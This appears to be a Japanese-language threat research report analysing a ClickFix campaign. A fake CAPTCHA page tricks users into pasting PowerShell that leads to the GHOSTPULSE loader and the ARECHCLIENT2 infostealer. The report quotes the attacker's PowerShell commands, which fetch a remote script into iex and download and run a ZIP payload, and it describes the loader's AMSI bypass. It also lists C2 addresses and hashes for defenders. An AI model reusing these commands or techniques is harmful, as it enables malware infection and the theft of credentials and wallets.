前文
Elastic Security Labsは、ソーシャルエンジニアリングの手法を通じてさまざまなマルウェアを配信する多段階のキャンペーンで、ClickFixの手法が人気を集めていることに注目しています。
当社の脅威インテリジェンスは、 ClickFix (最初に観察された手法)を主要な初期アクセスベクトルとして活用する活動が大幅に急増していることを示しています。このソーシャルエンジニアリング手法は、ユーザーをだまして悪意のあるPowerShellをコピー&ペーストさせ、マルウェアの実行につなげます。当社のテレメトリーは、 GHOSTPULSEローダーの新しいバージョンのデプロイにつながるインスタンスを含め、昨年からその使用を追跡しています。これにより、マルウェアやインフォスティーラーを使用したキャンペーンが、 2019 年に初めて観察されたが、現在では人気が大幅に急上昇しているLUMMAやARECHCLIENT2などのインフォスティーラーをターゲットにしたキャンペーンが始まりました。
この記事では、最近のClickFixキャンペーンを検証し、そのコンポーネント、採用された手法、および最終的に配信されるマルウェアについて詳しく説明します。
重要なポイント
- ClickFix: 非常に効果的で普及している初期アクセス方法として、依然として優れています。
- ゴーストパルス: 多段式ペイロードローダーとして広く使用され続けており、新しいモジュールと改良された回避技術による継続的な開発を特徴としています。特に、その初期設定は暗号化されたファイル内で配信されます。
- ARECHCLIENT2(SECTOPRAT): 2025年を通じて、悪意のある活動が大幅に増加しています。
最初のフック: ClickFix のソーシャル エンジニアリングの分解
成功する多段階の攻撃はすべて足場から始まりますが、最近の多くのキャンペーンでは、その最初のステップはClickFixによって満たされています。ClickFixは人間の心理を活用し、一見無害なユーザーインタラクションを妥協の出発点に変えます。
ClickFix の核となるのは、ユーザーを操作してシステム上で悪意のあるコードを誤って実行させるように設計されたソーシャル エンジニアリング手法です。一般的なオンライン行動や心理的傾向を食い物にし、ユーザーに欺瞞的なプロンプトを提示します。多くの場合、ブラウザの更新、システムエラー、さらにはCAPTCHA検証を装っています。このトリックはシンプルですが、信じられないほど効果的です:直接ダウンロードする代わりに、ユーザーは一見無害な「修正」(悪意のあるPowerShellコマンド)をコピーして、オペレーティングシステムの実行ダイアログに直接貼り付けるように指示されます。この一見自発的なアクションは、ユーザーがプロセスを開始するため、多くの従来の境界防御を回避します。
ClickFix は 2024 年 3 月に初めて脅威の世界で登場しましたが、急速に勢いを増し、 2024 全体で爆発的に普及し、2025 年に向けて積極的な上昇を続けています。その効果は、ユーザーがセキュリティチェックを無意識のうちにクリックするという潜在意識の習慣である「検証疲れ」を利用することにあります。見慣れたCAPTCHAや緊急の「修正」ボタンに直面したとき、多くのユーザーは、ルーチンに条件付けられて、根本的な要求を精査することなく、ただ従います。これにより、 ClickFix は非常に強力な初期アクセスベクトルとなり、初期防御の突破成功率が高いため、幅広い脅威アクターに好まれています。
Elasticが最近行ったEDDIESTEALERに関するElasticセキュリティの調査では、ClickFixがマルウェアのデプロイを促進する効果を示す別の具体例が示されており、その汎用性と脅威環境における広範な採用がさらに強調されています。
Elasticの社内テレメトリーはこの傾向を裏付けており、特に2025年第1四半期には、観測された環境全体でClickFix関連のアラートが大幅に増加したことが示されています。前四半期と比較して試行が増加しており、RATやInfoStealersなどの大量感染マルウェアの展開に主に焦点が当てられています。
ClickFix キャンペーンのARECHCLIENT2への道のり
ClickFix 手法は、多くの場合、大規模な多段階の攻撃の最初のステップとして機能します。最近、この進行を明確に示すキャンペーンを分析しました。この操作は、 ClickFix ルアーで始まり、ユーザーをだまして感染プロセスを開始させます。初期アクセスを取得した後、キャンペーンはGHOSTPULSE Loader(HIJACKLOADER、IDATLOADERとも呼ばれます)の更新バージョンをデプロイします。このローダーは、中間の .NET ローダーを取り込みます。この追加ステージは、最終的なペイロードである ARECHCLIENT2 (SECTOPRAT)サンプルをメモリに直接ロードする役割を果たします。この特定の攻撃チェーンは、敵対者がソーシャルエンジニアリングと隠されたローダー機能および複数の実行レイヤーを組み合わせて、データを盗み、最終的にリモート制御を取得する方法を示しています。
このキャンペーンは、のテレメトリで観察され、実際の実行とそのコンポーネントのシーケンスを直接確認することができました。
感染のテクニカル分析
感染チェーンは、CloudflareのAnti-DDoS Captcha検証を模倣したフィッシングページから始まります。
同じ初期ペイロードを配信する 2 つのインフラストラクチャ (どちらも 50.57.243[.]90に解決される) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ と https://clients[.]contology[.]com/captcha/ が観測されました。
このページでのユーザー操作により、実行が開始されます。GHOSTPULSEは、このキャンペーンのマルウェアローダーとして機能します。Elastic Security Labsはこのローダーを綿密に追跡しており、以前の調査(2023年と2024年)では、その初期機能について詳しく調べています。
この Web ページは、HTML コードと JavaScript を生成する高度に難読化された JavaScript スクリプトであり、PowerShell コマンドをクリップボードにコピーします。
ブラウザでランタイムHTMLコードを調べると、ページのフロントエンドは確認できますが、チェックボックスをクリックした後に実行されるスクリプトは表示されません Verify you are human.
簡単な解決策は、デバッガーで実行して、実行中に情報を取得することです。2番目のJSコードは難読化されていますが、2つの興味深い関数を簡単に識別できます。最初の関数である runClickedCheckboxEffectsは、クエリを実行してマシンのパブリック IP アドレスを取得し https://api.ipify[.]org?format=json, その IP アドレスを攻撃者のインフラストラクチャに送信し、感染をログに記録 https://koonenmagaziner[.]click/counter/<IP_address>, 。
2 番目の関数は、base64 でエンコードされた PowerShell コマンドをクリップボードにコピーします。
base64でデコードすると、次のようになります
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iex実行すると、次の PowerShell スクリプトがフェッチされます。
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"このキャンペーンで観測された感染プロセスには、 GHOSTPULSEのデプロイメントが次のように含まれており、ユーザーが ClickFixによってコピーされたPowerShellコマンドを実行した後、最初のスクリプトが追加の コマンドをフェッチして実行します。これらのPowerShell コマンドは 、ZIPファイル(ComponentStyle.zip)をリモートの場所からダウンロードし、被害者のシステム上の一時ディレクトリに抽出します。
抽出されたコンテンツには、 GHOSTPULSE のコンポーネント、特に無害な実行可能ファイル (Crysta_X64.exe) と悪意のあるダイナミックリンクライブラリ (DllXDownloadManager.dll) が含まれます。この設定では、正当な実行可能ファイルが悪意のあるDLLをロードする手法であるDLLサイドローディングを利用しています。ファイル(Heeschamjet.rc)は、次のステージのペイロードが暗号化された形式で含まれている IDAT ファイルです
また、ファイル Shonomteak.bxi, は、ローダーがステージ 2 と構成構造を取得するために暗号化して使用します。
GHOSTPULSE
ステージ1
GHOSTPULSE は、2023年にさかのぼるマルウェアです。Elasticの 2024 リサーチブログ記事で詳述されているように、PNGのピクセルにペイロードを埋め込むことで暗号化されたペイロードを画像に保存する新しい方法や、ゼットスケーラーリサーチの新しいモジュールなど、数多くのアップデートが継続的に行われています。
このキャンペーンで使用されたマルウェアには、 Shonomteak.bxiという名前の追加の暗号化ファイルが付属していました。ローダーのステージ 1 では、ファイル自体に格納されている値を使用して DWORD 追加操作を使用してファイルを復号化します。
次に、マルウェアは復号化されたファイルShonomteak.bxiからステージ 2 コードを抽出し、 LibraryLoadA 関数を使用してロードされたライブラリに挿入します。ライブラリ名は、復号化された同じファイルに保存されます。私たちの場合、それは vssapi.dllです。
次に、stage 2 関数は、IDAT PNG ファイルのファイル名、復号化されたShonomteak.bxi,内にあったステージ 2 設定、およびこの場合は Truenull に設定されたブール フィールドを含む構造体パラメーターb_detect_process呼び出されます。
ステージ2
ブール値のフィールド b_detect_process がTrueに設定されている場合、マルウェアはプロセスのリストをチェックして、プロセスが実行されているかどうかを確認する関数を実行します。プロセスが検出されると、実行は 5 秒遅延します。
以前のサンプルでは、バイナリに直接ハードコードされた構成を持つGHOSTPULSEを分析しました。一方、このサンプルには、マルウェアが適切に機能するために必要なすべての情報が含まれており、次のような情報が Shonomteak.bxi, に保存されています。
- DLL 名と Windows API のハッシュ
- IDATタグ:PNGファイル内の暗号化されたデータの開始を見つけるために使用されます
- IDAT文字列:単に「IDAT」です
- スキャンするプロセスのハッシュ
GHOSTPULSEについての最終的な感想
GHOSTPULSEは複数のアップデートを行ってきました。2024年に発見された新しい方法であるピクセルを使用してペイロードを保存するのではなく、暗号化されたペイロードを保存するためにIDATヘッダー方法を使用していることは、このファミリーのビルダーが新しいサンプルをコンパイルするための両方のオプションを維持していたことを示している可能性があります。
当社の構成抽出器は、両方の方法を使用してペイロード抽出を実行し、サンプルの質量分析に使用できます。更新されたツールは 、labs-releases リポジトリにあります。
ARECHCLIENT2
2025年には、ARECHCLIENT2(SectopRAT)が関与する活動の顕著な増加が観察されました。この難読化された.NETリモートアクセスツールは、 2019年11月に最初に特定 され、情報窃取機能で知られていましたが、現在、GHOSTPULSEはClickfixソーシャルエンジニアリング技術を通じて展開しています。私たちの先行研究では、2023年頃にARECHCLIENT2を活用したGHOSTPULSEの初期展開が実証されています。
GHOSTPULSEが新しく作成したプロセスでデプロイするペイロードは、x86ネイティブ.NETローダーであり、これによりロードARECHCLIENT2。
ローダーは、次の 3 つの手順を実行します。
- AMSI へのパッチ適用
- ペイロードの抽出と復号化
- CLR を読み込み、次に反射的に読み込みARECHCLIENT2
興味深いことに、デバッグ目的のエラー処理は、 MessageBoxA APIを使用したメッセージボックスの形でまだ存在し、たとえば、 .tls セクションが見つからない場合、文字列の "D1" を含むエラーメッセージボックスが表示されます。
次の表は、すべてのエラーメッセージとその説明を示しています。
| Message | 説明 |
|---|---|
| F1 | LoadLibraryExW フックに失敗しました |
| F2 | AMSI パッチ適用に失敗しました |
| D1 | .tlsセクションが見つかりません |
| W2の | CLR の読み込みに失敗しました |
このマルウェアは、 LoadLibraryExW APIにフックを設定します。このフックは、 amsi.dll がロードされるのを待ってから、 AmsiScanBuffer 0に別のフックを設定し、AMSIを効果的にバイパスします。
この後、ローダーは PE ヘッダーを解析して、メモリ内のポインターを .tls セクションにフェッチします。このセクションの最初の 0x40 バイトは XOR キーとして機能し、残りのバイトには暗号化された ARECHCLIENT2 サンプルが含まれており、ローダーはこれを復号化します。
最後に、 CLRCreateInstance Windows API を使用して .NET 共通言語ランタイム (CLR) をメモリに読み込み、ARECHCLIENT2を反射的に読み込みます。以下は、その実行方法 の例 です。
ARECHCLIENT2は、強力なリモートアクセス型トロイの木馬およびインフォスティーラーであり、幅広い機密性の高いユーザーデータやシステム情報を標的にするように設計されています。このマルウェアの主な目的は、主に以下に焦点を当てています。
- 資格情報と金融の盗難: ARECHCLIENT2は、暗号通貨ウォレット、ブラウザに保存されたパスワード、Cookie、自動入力データを明示的に対象としています。また、FTP、VPN、Telegram、Discord、Steamからの資格情報も取得することを目指しています。
- システムプロファイリングと偵察: ARECHCLIENT2 は、オペレーティング システムのバージョン、ハードウェア情報、IP アドレス、マシン名、ジオロケーション (都市、国、タイム ゾーン) など、広範なシステムの詳細を収集します。
- コマンドの実行: ARECHCLIENT2は、C2(C2)サーバーからコマンドを受信して実行し、感染したシステムに対するリモートコントロールを攻撃者に許可します。
ARECHCLIENT2マルウェアは、暗号化された文字列としてバイナリにハードコードされたC2144.172.97[.]2,に接続し、ハードコードされたペーストビンリンクhttps://pastebin[.]com/raw/Wg8DHh2xからセカンダリC2(143.110.230[.]167)IPも取得します。
インフラストラクチャ分析
悪意のあるキャプチャページは、次のIPアドレスを指すURIの/captchaと/Clientの下の2つのドメインclients.dealeronlinemarketing[.]comとclients.contology[.]comでホストされていました50.57.243[.]90。
私たちは、両方のエンティティが長い運営履歴を持つデジタル広告代理店にリンクされていることを確認しました。さらに調査を進めると、同社は一貫してクライアントのサブドメインを利用して、広告目的でPDFやフォームなどのさまざまなコンテンツをホストしていることがわかりました。
攻撃者はサーバー 50.57.243[.]90 を侵害し、会社の既存のインフラストラクチャと広告の範囲を悪用して、広範な悪意のある活動を促進している可能性が高いと評価しています。
攻撃チェーンのさらに下流では、ARECHCLIENT2 C2 IP(143.110.230[.]167 および 144.172.97[.]2)の分析により、追加のキャンペーンインフラストラクチャが明らかになりました。どちらのサーバーも、AS14061とAS14956の異なる自律システムでホストされています。
共有バナーハッシュ(@ValidinLLCHOST-BANNER_0_HASH、これはWebサーバーの応答バナーのハッシュ値)を軸にすると、過去7か月間にさまざまな自律システム全体で 120 一意のサーバーが明らかになりました。これらの 120 個のうち、 19 個は、 Maltrail リポジトリに記載されているように、以前に他のさまざまなベンダーによって "Sectop RAT" (別名 ARECHCLIENT2) とラベル付けされています。
VirusTotal に対して最新の発生 (2025年 6 月 1日以降の最初の発生) の焦点を絞った検証を実行すると、コミュニティ メンバーが以前にすべての 13 を Sectop RAT C2 としてラベル付けしていたことがわかります。
これらのサーバーはすべて、同様の構成です。
- Canonical Linux の実行
- SSHオン
22 - 不明な TCP がオン
443 8080上の Nginx HTTP 、および- HTTP on
9000(C2 ポート)
ポート 9000 のサービスにはWindowsサーバーヘッダーがありますが、SSHサービスとNGINX HTTPサービスの両方でUbuntuがオペレーティングシステムとして指定されています。これは、C2のリバースプロキシを使用して、使い捨てのフロントエンドリダイレクタを維持することで実際のサーバーを保護することを示唆しています。
ARECHCLIENT2 IOC:
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
これは活発なキャンペーンであり、このインフラストラクチャは過去 7 か月間で高い頻度で構築され、取り壊されています。公開時点では、次の C2 ノードはまだアクティブです。
| Value | First Seen | 最後の検知 |
|---|---|---|
66.63.187.22 | 2025-06-15 | 2025-06-15 |
45.94.47.164 | 2025-06-02 | 2025-06-15 |
84.200.17.129 | 2025-06-04 | 2025-06-15 |
82.117.255.225 | 2025-03-14 | 2025-06-15 |
45.77.154.115 | 2025-06-05 | 2025-06-15 |
144.172.94.120 | 2025-05-20 | 2025-06-15 |
79.124.62.10 | 2025-05-15 | 2025-06-15 |
82.117.242.178 | 2025-03-14 | 2025-06-15 |
195.82.147.132 | 2025-04-10 | 2025-06-15 |
62.60.247.154 | 2025-05-18 | 2025-06-15 |
91.199.163.74 | 2025-04-03 | 2025-06-15 |
172.86.72.81 | 2025-03-13 | 2025-06-15 |
107.189.24.67 | 2025-06-02 | 2025-06-15 |
143.110.230.167 | 2025-06-08 | 2025-06-15 |
185.156.72.80 | 2025-05-15 | 2025-06-15 |
85.158.110.179 | 2025-05-11 | 2025-06-15 |
144.172.101.228 | 2025-05-13 | 2025-06-15 |
192.124.178.244 | 2025-06-01 | 2025-06-15 |
107.189.18.56 | 2025-04-27 | 2025-06-15 |
194.87.29.62 | 2025-05-18 | 2025-06-15 |
185.156.72.63 | 2025-06-12 | 2025-06-12 |
193.149.176.31 | 2025-06-08 | 2025-06-12 |
45.141.87.249 | 2025-06-12 | 2025-06-12 |
176.126.163.56 | 2025-05-06 | 2025-06-12 |
185.156.72.71 | 2025-05-15 | 2025-06-12 |
91.184.242.37 | 2025-05-15 | 2025-06-12 |
45.141.86.159 | 2025-05-15 | 2025-06-12 |
67.220.72.124 | 2025-06-05 | 2025-06-12 |
45.118.248.29 | 2025-01-28 | 2025-06-12 |
172.105.148.233 | 2025-06-03 | 2025-06-10 |
194.26.27.10 | 2025-05-06 | 2025-06-10 |
45.141.87.212 | 2025-06-08 | 2025-06-08 |
45.141.86.149 | 2025-05-15 | 2025-06-08 |
172.235.190.176 | 2025-06-08 | 2025-06-08 |
45.141.86.82 | 2024-12-13 | 2025-06-08 |
45.141.87.7 | 2025-05-13 | 2025-06-06 |
185.125.50.140 | 2025-04-06 | 2025-06-03 |
まとめ
この多段階のサイバーキャンペーンは、初期アクセスにClickFixソーシャルエンジニアリングを効果的に活用し、 GHOSTPULSE ローダーをデプロイして中間の.NETローダーを配信し、最終的にメモリ常駐型の ARECHCLIENT2 ペイロードを実現します。この階層化された攻撃チェーンは、広範な認証情報、財務データ、システムデータを収集すると同時に、攻撃者に侵害されたマシンに対するリモート制御機能を許可します。
MITRE ATT&CK
Elasticは、 MITRE ATT&CK フレームワークを使用して、企業ネットワークに対してAdvanced Persistent Threatが使用する一般的な戦術、手法、手順を文書化しています。
戦術(Tactics)
戦術は、テクニックまたはサブテクニックの理由を表します。 それは敵の戦術的な目標であり、行動を実行する理由です。
手法
手法は、敵対者がアクションを実行することによって戦術的な目標を達成する方法を表します。
- フィッシング
- コマンドおよびスクリプティングインタープリター
- DLL サイドローディング
- 反射型コードの読み込み
- ユーザーインタラクション
- イングレスツール転送
- システム情報の検出
- プロセスディスカバリー
- WebセッションCookieの窃取
[マルウェア]を検出しています
検知
Elastic Defend は、次の 動作保護ルールを使用してこの脅威を検出します。
- Windows Run による疑わしいコマンド シェルの実行
- 疑わしいトップレベルドメインへのDNSクエリ
- 署名付きバイナリプロキシによって書き込まれたファイルのライブラリロード
- 署名付きバイナリプロキシによるWebServiceへの接続
- 潜在的なブラウザ情報の検出
ヤラ
観測
この研究では、次の観測量について議論しました。
| すぐれた監視性 | タイプ | 名前 | 参考 |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | ドメイン | Captchaサブドメイン | |
clients.contology[.]com | ドメイン | Captchaサブドメイン | |
koonenmagaziner[.]click | ドメイン | ||
50.57.243[.]90 | IPv4-アドレス | clients.dealeronlinemarketing[.]com & clients.contology[.]com IP アドレス | |
144.172.97[.]2 | IPv4-アドレス | ARECHCLIENT2 C&Cサーバー | |
143.110.230[.]167 | IPv4-アドレス | ARECHCLIENT2 C&Cサーバー | |
pastebin[.]com/raw/Wg8DHh2x | IPv4-アドレス | ARECHCLIENT2 C&CサーバIPを含む | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256の | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256の | Heeschamjiet.rc | PNGゴーストパルス |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256の | DOTNETローダー | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256の | ARECHCLIENT2 |
参照資料
上記の研究を通じて、以下のことが参照されました。